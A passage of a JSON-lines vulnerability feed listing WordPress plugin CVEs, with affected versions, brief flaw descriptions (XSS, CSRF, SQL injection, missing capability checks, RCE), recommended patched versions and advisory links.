{"CVE_ID":"CVE-2022-47136","slug":"ninja-tables","versionEndExcluding":"4.3.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPManageNinja LLC Ninja Tables \u2013 Best Data Table Plugin for WordPress plugin <=\u00a04.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-tables\\\/wordpress-ninja-tables-best-data-table-plugin-for-wordpress-plugin-4-3-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ninja-tables\\\/wordpress-ninja-tables-best-data-table-plugin-for-wordpress-plugin-4-3-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4451","slug":"ninjafirewall","versionEndExcluding":"4.3.4","description":"The NinjaFirewall plugin for WordPress is vulnerable to Authenticated PHAR Deserialization in versions up to, and including, 4.3.3. This allows authenticated attackers to perform phar deserialization on the server.  This deserialization can allow other plugin or theme exploits if vulnerable software is present (WordPress, and NinjaFirewall).","recommendation":"Update to version 4.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a1fc6c9-50cd-40fd-a777-9eed98aab797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a1fc6c9-50cd-40fd-a777-9eed98aab797?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/security-issue-fixed-in-ninjafirewall-wp-edition\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/security-issue-fixed-in-ninjafirewall-wp-edition\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5026","slug":"enhanced-tooltipglossary","versionImpact":"4.3.3","versionEndExcluding":"4.3.4","description":"The CM Tooltip Glossary WordPress plugin before 4.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a86584f6-119b-45c3-bc6e-dc18e3501db7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a86584f6-119b-45c3-bc6e-dc18e3501db7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0546","slug":"fluentform","versionEndExcluding":"4.3.25","description":"The Contact Form Plugin WordPress plugin before 4.3.25 does not properly sanitize and escape the srcdoc attribute in iframes in it's custom HTML field type, allowing a logged in user with roles as low as contributor to inject arbitrary javascript into a form which will trigger for any visitor to the form or admins previewing or editing the form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/078f33cd-0f5c-46fe-b858-2107a09c6b69\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/078f33cd-0f5c-46fe-b858-2107a09c6b69\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8872","slug":"order-hours-scheduler-for-woocommerce","versionImpact":"4.3.20","versionEndExcluding":"4.3.22","description":"The Store Hours for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.3.20. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cbb51fe-ae7f-4fe8-89ad-38f6d3238cea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cbb51fe-ae7f-4fe8-89ad-38f6d3238cea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157721\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157721\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-hours-scheduler-for-woocommerce\\\/tags\\\/4.3.20\\\/includes\\\/Aspect\\\/Page.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-hours-scheduler-for-woocommerce\\\/tags\\\/4.3.20\\\/includes\\\/Aspect\\\/Page.php#L155\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1617","slug":"wp-invoice","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e40e506-ad02-44ca-9d21-3634f3907aad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e40e506-ad02-44ca-9d21-3634f3907aad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13491","slug":"small-package-quotes-fedex-edition","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Small Package Quotes \u2013 For Customers of FedEx plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242108%40small-package-quotes-fedex-edition&new=3242108%40small-package-quotes-fedex-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242108%40small-package-quotes-fedex-edition&new=3242108%40small-package-quotes-fedex-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba311865-be4b-4c56-a761-409582e981b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba311865-be4b-4c56-a761-409582e981b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2544","slug":"popup-builder","versionImpact":"4.3.0","versionEndExcluding":"4.3.2","description":"The Popup Builder plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on all AJAX actions. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform multiple unauthorized actions, such as deleting subscribers, and importing subscribers to conduct stored cross-site scripting attacks.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04802c63-4a5d-4948-9ef1-cf89c4cc757e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04802c63-4a5d-4948-9ef1-cf89c4cc757e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096000%40popup-builder%2Ftrunk&old=3085485%40popup-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096000%40popup-builder%2Ftrunk&old=3085485%40popup-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4577","slug":"custom-facebook-feed","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Smash Balloon Social Post Feed \u2013 Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L254\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L254\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec3de7e2-4a29-401f-af2c-0ce78d768eae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec3de7e2-4a29-401f-af2c-0ce78d768eae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6696","slug":"popup-builder","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Popup Builder \u2013 Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 4.3.1. While some functions contain a nonce check, the nonce can be obtained from the profile page of a logged-in user. This allows subscribers to perform several actions including deleting subscribers and perform blind Server-Side Request Forgery.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86ec30-7a9d-4c36-8559-bde331c8b958?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86ec30-7a9d-4c36-8559-bde331c8b958?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/tags\\\/4.2.3\\\/com\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/tags\\\/4.2.3\\\/com\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096000\\\/popup-builder\\\/trunk\\\/com\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096000\\\/popup-builder\\\/trunk\\\/com\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12532","slug":"bwd-elementor-addons","versionImpact":"4.3.18","versionEndExcluding":"4.3.19","description":"The BWD Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.18 in widgets\/bwdeb-content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 4.3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211460\\\/bwd-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211460\\\/bwd-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bdf6a52-7316-440b-9d36-d405a672dce1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bdf6a52-7316-440b-9d36-d405a672dce1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36831","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.3.17","versionEndExcluding":"4.3.18","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on multiple user privilege\/security functions provided in versions up to, and including 4.3.17. This makes it possible for low-privileged attackers, like subscribers, to perform restricted actions that would be otherwise locked to a administrative-level user.","recommendation":"Update to version 4.3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3709465d-6d67-45bd-abb9-4875065b8129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3709465d-6d67-45bd-abb9-4875065b8129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2020\\\/09\\\/insufficient-privilege-validation-in-nextscripts-social-networks-auto-poster.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2020\\\/09\\\/insufficient-privilege-validation-in-nextscripts-social-networks-auto-poster.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0641578b-16b9-4d79-af69-b4886840da36\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0641578b-16b9-4d79-af69-b4886840da36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-nextscripts-social-networks-auto-poster-security-bypass-4-3-17\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-nextscripts-social-networks-auto-poster-security-bypass-4-3-17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4571","slug":"give","versionImpact":"4.3.0","versionEndExcluding":"4.3.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized view and modification of data due to an insufficient capability check on the permissionsCheck functions in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to view or delete fundraising campaigns, view donors' data, modify campaign events, etc.","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/Endpoint.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/Endpoint.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/GetLogs.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/GetLogs.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/DeleteCampaignListTable.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/DeleteCampaignListTable.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/GetCampaignsListTable.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/GetCampaignsListTable.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/Endpoint.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/Endpoint.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/ListDonors.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/ListDonors.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305112\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305112\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f03b4ef-e877-430e-a440-3af0feca818c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f03b4ef-e877-430e-a440-3af0feca818c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5201","slug":"thesis-openhook","versionImpact":"4.3.0","versionEndExcluding":"4.3.1","description":"The OpenHook plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.3.0 via the 'php' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to execute code on the server. This requires the [php] shortcode setting to be enabled on the vulnerable site.","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.1\\\/inc\\\/shortcodes.php?rev=2972840#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.1\\\/inc\\\/shortcodes.php?rev=2972840#L24\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37b9ed0e-5af2-47c1-b2da-8d103e4c31bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37b9ed0e-5af2-47c1-b2da-8d103e4c31bf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.0\\\/inc\\\/shortcodes.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.0\\\/inc\\\/shortcodes.php#L28\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5151","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ede4c66-9932-4ba6-bba1-0ba13f5a2f8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ede4c66-9932-4ba6-bba1-0ba13f5a2f8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5034","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f3a3b5-07bf-4cb3-b358-8488808733e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f3a3b5-07bf-4cb3-b358-8488808733e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5033","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd42765a-1300-453f-9835-6e646c87e496\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd42765a-1300-453f-9835-6e646c87e496\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5032","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bb92693-23b3-4250-baee-af38b7e615e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bb92693-23b3-4250-baee-af38b7e615e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4086","slug":"enhanced-tooltipglossary","versionImpact":"4.2.11","versionEndExcluding":"4.3.0","description":"The CM Tooltip Glossary \u2013 Powerful Glossary Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.11. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings or reset them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3e2ddde-1421-4352-b93a-1492574f624e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3e2ddde-1421-4352-b93a-1492574f624e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076616\\\/enhanced-tooltipglossary\\\/trunk\\\/settings\\\/CMTT_Settings.php?contextall=1&old=3029791&old_path=%2Fenhanced-tooltipglossary%2Ftrunk%2Fsettings%2FCMTT_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076616\\\/enhanced-tooltipglossary\\\/trunk\\\/settings\\\/CMTT_Settings.php?contextall=1&old=3029791&old_path=%2Fenhanced-tooltipglossary%2Ftrunk%2Fsettings%2FCMTT_Settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2506","slug":"popup-builder","versionImpact":"4.2.7","versionEndExcluding":"4.3.0","description":"The Popup Builder \u2013 Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS functionality in all versions up to, and including, 4.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804a973e-4650-428c-910f-09e4fc3aa4bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804a973e-4650-428c-910f-09e4fc3aa4bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085485%40popup-builder&new=3085485%40popup-builder&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085485%40popup-builder&new=3085485%40popup-builder&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0268","slug":"mega-addons-for-visual-composer","versionEndExcluding":"4.3.0","description":"The Mega Addons For WPBakery Page Builder WordPress plugin before 4.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99389641-ad1e-45c1-a42f-2a010ee22d76\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99389641-ad1e-45c1-a42f-2a010ee22d76\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0958","slug":"ultimate-auction","versionImpact":"4.2.9","versionEndExcluding":"4.3.0","description":"The Ultimate WordPress Auction Plugin plugin for WordPress is vulnerable to unauthorized access to functionality in all versions up to, and including, 4.2.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary auctions, posts as well as pages and allows them to execute other actions related to auction handling.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ajax-actions\\\/send-private-msg.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ajax-actions\\\/send-private-msg.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242416\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242416\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af3675c9-3a6b-4139-85e8-2fc57f290e82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af3675c9-3a6b-4139-85e8-2fc57f290e82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4214","slug":"apppresser","versionImpact":"4.2.5","versionEndExcluding":"4.3.0","description":"The AppPresser plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 4.2.5. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit.","recommendation":"Update to version 4.3.0, or a newer patched 